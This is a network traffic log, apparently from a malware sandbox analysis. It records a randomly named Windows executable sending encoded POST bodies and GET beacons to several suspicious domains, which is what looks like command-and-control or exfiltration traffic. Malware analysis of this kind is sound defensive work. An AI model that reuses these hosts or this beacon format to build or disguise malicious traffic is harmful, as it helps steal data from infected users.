                                                                                          2192.168.2.649971154.213.39.66802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 14:59:53.860703945 CET802OUTPOST /cu07/ HTTP/1.1
                                                                                          Host: www.f5jh81t3k1w8.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.f5jh81t3k1w8.sbs
                                                                                          Referer: http://www.f5jh81t3k1w8.sbs/cu07/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 235
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 77 33 6e 37 50 78 2b 30 4c 78 4b 35 45 4f 76 68 52 58 66 37 33 74 43 77 68 4b 35 69 48 6a 54 53 42 73 52 42 33 57 63 54 52 6d 38 39 71 2b 44 42 64 63 6c 53 6e 79 76 31 69 33 4e 51 46 46 36 50 33 4c 5a 69 51 35 35 61 30 75 79 36 34 6c 31 6f 70 78 78 5a 4f 73 6c 2b 6d 4a 6f 4e 36 54 52 4b 71 65 51 7a 6d 7a 32 6e 52 36 33 6e 55 7a 67 46 37 36 77 30 4d 6d 2f 56 45 78 43 4f 35 38 45 39 75 4e 46 70 75 43 52 41 56 42 55 63 56 59 50 7a 78 72 70 69 46 54 64 49 69 57 4d 67 51 64 4f 62 33 30 64 6e 53 30 45 32 77 71 59 30 76 6e 68 4e 4f 41 4a 78 50 6a 43 4b 51 46 56 6e 66 6d 2f 4e 7a 55 4a 34 6f 48 68 70 36 41 62 75 73 6d 4a 63 6c 66 38 44 6a 37 49 61 43 30 37 51 42 4d 46 72 42 51 3d 3d
                                                                                          Data Ascii: T4OdNH=w3n7Px+0LxK5EOvhRXf73tCwhK5iHjTSBsRB3WcTRm89q+DBdclSnyv1i3NQFF6P3LZiQ55a0uy64l1opxxZOsl+mJoN6TRKqeQzmz2nR63nUzgF76w0Mm/VExCO58E9uNFpuCRAVBUcVYPzxrpiFTdIiWMgQdOb30dnS0E2wqY0vnhNOAJxPjCKQFVnfm/NzUJ4oHhp6AbusmJclf8Dj7IaC07QBMFrBQ==
                                                                                          Jan 8, 2025 14:59:54.737745047 CET691INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 13:59:54 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 548
                                                                                          Connection: close
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          3192.168.2.649979154.213.39.66802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 14:59:56.702795982 CET1815OUTPOST /cu07/ HTTP/1.1
                                                                                          Host: www.f5jh81t3k1w8.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.f5jh81t3k1w8.sbs
                                                                                          Referer: http://www.f5jh81t3k1w8.sbs/cu07/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1247
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 77 33 6e 37 50 78 2b 30 4c 78 4b 35 45 4f 76 68 52 58 66 37 33 74 43 77 68 4b 35 69 48 6a 54 53 42 73 52 42 33 57 63 54 52 6d 30 39 71 4d 4c 42 63 38 5a 53 6d 79 76 31 72 58 4e 64 46 46 36 53 33 4b 78 6d 51 34 45 6c 30 74 4b 36 71 32 39 6f 38 77 78 5a 58 38 6c 2b 36 35 6f 49 2b 54 52 54 71 65 41 33 6d 33 53 6e 52 36 33 6e 55 31 6b 46 74 66 63 30 63 57 2f 4b 54 42 43 53 7a 63 45 56 75 4e 63 63 75 43 6b 2f 56 78 30 63 55 35 2f 7a 39 2b 46 69 59 6a 64 4b 6c 57 4e 6a 51 64 79 51 33 30 51 57 53 33 5a 54 77 70 45 30 74 68 51 38 4b 67 56 7a 62 6c 54 74 54 43 78 36 55 67 2f 70 33 6e 49 43 6e 31 31 59 7a 6c 2f 39 73 44 68 69 6a 70 6c 47 6a 61 74 33 45 68 79 65 4a 50 45 6a 64 31 48 4c 61 65 73 30 70 6a 30 45 46 6e 6b 61 59 4c 34 5a 49 34 65 62 4a 4d 6b 45 64 58 65 50 48 59 63 7a 53 36 32 6c 51 53 55 36 47 46 55 7a 34 73 56 61 6e 47 71 64 6f 36 6a 32 34 75 57 54 64 4c 5a 64 2b 52 78 31 36 70 49 54 67 2f 50 50 76 59 73 64 46 70 4b 42 4a 72 2f 49 50 6f 54 46 33 31 48 79 50 4b 61 6d 37 37 38 [TRUNCATED]
                                                                                          Data Ascii: T4OdNH=w3n7Px+0LxK5EOvhRXf73tCwhK5iHjTSBsRB3WcTRm09qMLBc8ZSmyv1rXNdFF6S3KxmQ4El0tK6q29o8wxZX8l+65oI+TRTqeA3m3SnR63nU1kFtfc0cW/KTBCSzcEVuNccuCk/Vx0cU5/z9+FiYjdKlWNjQdyQ30QWS3ZTwpE0thQ8KgVzblTtTCx6Ug/p3nICn11Yzl/9sDhijplGjat3EhyeJPEjd1HLaes0pj0EFnkaYL4ZI4ebJMkEdXePHYczS62lQSU6GFUz4sVanGqdo6j24uWTdLZd+Rx16pITg/PPvYsdFpKBJr/IPoTF31HyPKam778QkMVRncwjH4knHrITUda9gv8sXFlM8QkCl7nnb/bzUl4y9Pc0x29RR2MgU8gpApiLVRJzdY0YL2LISM60Ub07mgxlJEMLeDu5qzvP8DxYqL3Ags0tS9DQyFGdJtOWGcnEpDNySIwD9CXHpyu/OYqB277z8S25+6i18B4v2PrXg3F9ucMLtEdnEpgefk8FyzCzazRS6Dm3YqDwul/wspxyCRLJ1VpxfZbj110eNDNWNbScVQeF/SARjsflK8m9VSVUGc/uE3rehIswpUTx9TbL7AFlf1OkHLwgclQ1eENScOWqzh6UM+TbhjNyon3/SdWG4HyXHdIQlm1rdPEeugPEKc//gmQ8we2KDXWbhApbNEkPj+AkNpkPalqw3JeUfIyNWvHkQYc6OPy1BusBcjSSdZcWAQWXEn61CLLzvqjiQWitDvUC4a1jhLk+XqTkUXj9wuwu8yKWDDPu6/vz0D630gAo7qbFmDwk+3xaciuquUJq4QlGaa92PPQnj8REerVNsXjZhQGgDC14+ZuCB/jg8DEcy7KJRVIDzS8FGfi8N8Vm8i2j8oPQQ0luFr9NXja41iUX6J9+Swi5K2PhCRBPLUdiszAkrRn6BR6pNOrB5AlUA7TNGOEehbaLHZnaOAeIT3tWDUsGhUK+3as+qDbSkfQwnkAp3xdA3 [TRUNCATED]
                                                                                          Jan 8, 2025 14:59:57.587821007 CET691INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 13:59:57 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 548
                                                                                          Connection: close
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          4192.168.2.649980154.213.39.66802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 14:59:59.242489100 CET517OUTGET /cu07/?T4OdNH=91PbMFSFbRabMZnMSUj76NvR/Zd0MhT8JKpW4EQcOk8mlMTVcdIaqQPrq3FRSR+owpFtRocVxvjr424E5RpVHJgZhbFN+EtYqaINmBGTcL2VcGMzu+tmB3TsTAvOn48cudhpsmM=&r4=tP5HWLt8wXstw4H HTTP/1.1
                                                                                          Host: www.f5jh81t3k1w8.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:00:00.156548023 CET691INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 13:59:59 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 548
                                                                                          Connection: close
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          5192.168.2.64998147.83.1.90802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:00:05.203670979 CET763OUTPOST /6jon/ HTTP/1.1
                                                                                          Host: www.cruycq.info
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.cruycq.info
                                                                                          Referer: http://www.cruycq.info/6jon/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 211
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 6f 61 64 59 78 38 31 4c 73 37 7a 53 76 57 49 64 6a 32 6e 66 76 67 6a 31 58 67 7a 45 4e 74 76 67 59 50 45 37 41 77 34 33 37 57 4a 51 70 49 4b 4e 71 44 47 53 33 69 79 46 6c 67 4f 76 74 74 57 6a 75 50 51 73 4b 47 41 6b 5a 70 2b 6d 33 39 57 78 36 70 6c 65 51 64 76 79 63 50 73 51 41 48 5a 71 39 42 63 4b 58 61 6c 6b 42 73 2b 6e 6c 2b 32 37 4a 50 35 4e 5a 50 6f 55 6f 6f 39 48 6c 33 7a 78 4a 59 31 2b 41 32 2b 6e 77 54 6b 46 38 33 4b 69 54 66 67 71 50 2f 65 36 67 43 64 56 58 51 75 68 41 6e 68 58 57 4f 6f 4e 63 55 4c 44 77 69 56 55 64 6a 61 35 70 62 47 71 4c 66 48 67 59 30 61 39 57 76 4c 57 43 4c 4f 4f 77 77 35 50
                                                                                          Data Ascii: T4OdNH=oadYx81Ls7zSvWIdj2nfvgj1XgzENtvgYPE7Aw437WJQpIKNqDGS3iyFlgOvttWjuPQsKGAkZp+m39Wx6pleQdvycPsQAHZq9BcKXalkBs+nl+27JP5NZPoUoo9Hl3zxJY1+A2+nwTkF83KiTfgqP/e6gCdVXQuhAnhXWOoNcULDwiVUdja5pbGqLfHgY0a9WvLWCLOOww5P
                                                                                          Jan 8, 2025 15:00:06.834764957 CET137INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.18.0
                                                                                          Date: Wed, 08 Jan 2025 14:00:06 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          6192.168.2.64998247.83.1.90802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:00:07.749247074 CET787OUTPOST /6jon/ HTTP/1.1
                                                                                          Host: www.cruycq.info
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.cruycq.info
                                                                                          Referer: http://www.cruycq.info/6jon/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 235
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 6f 61 64 59 78 38 31 4c 73 37 7a 53 75 31 41 64 6d 58 6e 66 71 41 6a 30 4a 51 7a 45 48 4e 75 70 59 50 49 37 41 78 39 6f 37 46 74 51 6f 73 47 4e 74 42 2b 53 30 69 79 46 71 41 4f 71 6a 4e 57 34 75 50 63 37 4b 44 34 6b 5a 71 43 6d 33 38 47 78 36 36 4e 5a 51 4e 76 4b 64 2f 73 53 45 48 5a 71 39 42 63 4b 58 61 78 64 42 73 32 6e 69 50 47 37 49 72 56 4d 55 76 6f 54 72 6f 39 48 30 48 7a 31 4a 59 31 59 41 79 6d 4a 77 52 73 46 38 33 61 69 53 4c 38 74 42 50 65 6a 2b 79 63 38 63 56 58 4b 47 45 6b 67 53 59 67 73 4e 32 47 6b 38 30 49 4f 42 51 61 61 37 4c 6d 6f 4c 64 66 53 59 55 61 58 55 76 7a 57 51 63 43 70 2f 45 63 73 77 6c 49 6d 52 63 78 7a 63 7a 59 56 73 41 68 33 44 39 77 78 5a 77 3d 3d
                                                                                          Data Ascii: T4OdNH=oadYx81Ls7zSu1AdmXnfqAj0JQzEHNupYPI7Ax9o7FtQosGNtB+S0iyFqAOqjNW4uPc7KD4kZqCm38Gx66NZQNvKd/sSEHZq9BcKXaxdBs2niPG7IrVMUvoTro9H0Hz1JY1YAymJwRsF83aiSL8tBPej+yc8cVXKGEkgSYgsN2Gk80IOBQaa7LmoLdfSYUaXUvzWQcCp/EcswlImRcxzczYVsAh3D9wxZw==
                                                                                          Jan 8, 2025 15:00:10.233587980 CET137INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.18.0
                                                                                          Date: Wed, 08 Jan 2025 14:00:09 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0
                                                                                          Jan 8, 2025 15:00:10.233931065 CET137INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.18.0
                                                                                          Date: Wed, 08 Jan 2025 14:00:09 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0
                                                                                          Jan 8, 2025 15:00:10.234111071 CET137INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.18.0
                                                                                          Date: Wed, 08 Jan 2025 14:00:09 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          7192.168.2.64998347.83.1.90802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:00:10.295020103 CET1800OUTPOST /6jon/ HTTP/1.1
                                                                                          Host: www.cruycq.info
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.cruycq.info
                                                                                          Referer: http://www.cruycq.info/6jon/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1247
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 6f 61 64 59 78 38 31 4c 73 37 7a 53 75 31 41 64 6d 58 6e 66 71 41 6a 30 4a 51 7a 45 48 4e 75 70 59 50 49 37 41 78 39 6f 37 46 6c 51 6f 5a 61 4e 74 6d 53 53 31 69 79 46 6a 67 4f 72 6a 4e 58 67 75 4f 31 54 4b 44 38 65 5a 73 4f 6d 6c 4f 65 78 72 2f 78 5a 62 4e 76 4b 57 66 73 52 41 48 5a 2f 39 42 4d 4f 58 61 68 64 42 73 32 6e 69 4d 65 37 59 50 35 4d 57 76 6f 55 6f 6f 39 78 6c 33 7a 52 4a 59 38 74 41 79 79 33 77 67 4d 46 38 57 71 69 51 2b 67 74 48 66 65 32 2f 79 63 6b 63 56 54 56 47 48 52 62 53 59 38 57 4e 32 79 6b 2b 68 6b 53 51 42 61 6c 75 4b 53 51 62 76 62 31 57 6a 57 4f 64 63 44 36 59 39 71 44 33 58 49 68 6f 6c 55 48 51 38 31 2f 56 79 63 4c 79 31 59 47 50 70 35 2f 47 79 47 70 65 47 58 61 61 34 37 4a 70 74 57 4c 64 48 38 4d 45 52 55 55 41 48 30 46 39 34 45 79 42 35 78 5a 53 51 68 4a 78 46 52 63 64 71 6d 42 47 6e 57 4c 54 76 43 75 46 6f 49 71 6f 6b 55 52 39 68 76 55 72 55 54 4a 76 68 50 61 66 61 64 56 59 75 39 2f 79 74 6c 4b 6c 69 6e 50 79 2f 6d 5a 58 6b 64 4d 78 63 39 75 67 47 61 [TRUNCATED]
                                                                                          Data Ascii: T4OdNH=oadYx81Ls7zSu1AdmXnfqAj0JQzEHNupYPI7Ax9o7FlQoZaNtmSS1iyFjgOrjNXguO1TKD8eZsOmlOexr/xZbNvKWfsRAHZ/9BMOXahdBs2niMe7YP5MWvoUoo9xl3zRJY8tAyy3wgMF8WqiQ+gtHfe2/yckcVTVGHRbSY8WN2yk+hkSQBaluKSQbvb1WjWOdcD6Y9qD3XIholUHQ81/VycLy1YGPp5/GyGpeGXaa47JptWLdH8MERUUAH0F94EyB5xZSQhJxFRcdqmBGnWLTvCuFoIqokUR9hvUrUTJvhPafadVYu9/ytlKlinPy/mZXkdMxc9ugGaAflk/9J9Q/qPq3Qk78IEwcblCZkUiLqkoak+IatE60hh3sep3JPEpytW+jvMRTq3QmQLKht7Y0Atpfsm6X+dqLKSvMfiapPbn/Srd7/w055kZnZ/Fn7l4WFfp/8frEe6sRTPGRr13AakWTKcIhd7qAigKSMxGoBPRYI55oysaJrCJxWB0aBBuoCuY88gHbl/YpapDf8oDyrFjFSwf/TOmcDdylPmOp3PvHW4m2K6r2MuOG31YAVPOCPBu7yKIbUhlTJ0BogFcPUL/kQMwrfNYTH+Sw28aPrCfdhFhWUH4pDz+Eupvr3IyxBOwDdihdMHh6KxX6TEduXkdPDy/GlhRW9LrLfeQwXPWora5S/ZUnT7QXucXOsx5TXo2QOLywzH+mfQwJfE2GhH8fbYSY9liyMfDpnBMwQ/ml3A7UewyF+iX+a7ogYK9eISmVHR/2jwKr9pTN6y8ZDus/vlcMePzk/j7hTZ3EvmECL/+lBGsEgGpUOkIeTj+FFf4a+SZa+acXgBf+7S6boScPfAoBL8Q2P5quMMhCU0py0aEw88dW8sqhjoOwMeU4ZnEZBsAkU2HetYEN4/vrKwI25Ud4WVYiQPgjxqGfn4KhJfDKVq78HdaB3IMPCrIwTypthuI3mLz//H4lejMLvv2muMDso2f/zB5WhLazC0An [TRUNCATED]


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          8192.168.2.64998447.83.1.90802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:00:12.887418985 CET512OUTGET /6jon/?r4=tP5HWLt8wXstw4H&T4OdNH=lY14yI5fwZOcgUQUpnTLlx+QJBfbC4DwEOc7MQQgkkxJhrqVuxiq0TqPiA2X0dq4ve8sLU4ITp6q3cu8oZorZNmhdsAOEHd31HcaUahVOt7Sj+u/MvofX8Uu67Ih0HTVKoUtY2c= HTTP/1.1
                                                                                          Host: www.cruycq.info
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:00:14.452493906 CET139INHTTP/1.1 567 unknown
                                                                                          Server: nginx/1.18.0
                                                                                          Date: Wed, 08 Jan 2025 14:00:14 GMT
                                                                                          Content-Length: 17
                                                                                          Connection: close
                                                                                          Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                                          Data Ascii: Request too large


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          9192.168.2.649985104.21.53.168802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:00:19.497598886 CET766OUTPOST /qc6u/ HTTP/1.1
                                                                                          Host: www.neoparty.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.neoparty.sbs
                                                                                          Referer: http://www.neoparty.sbs/qc6u/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 211
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
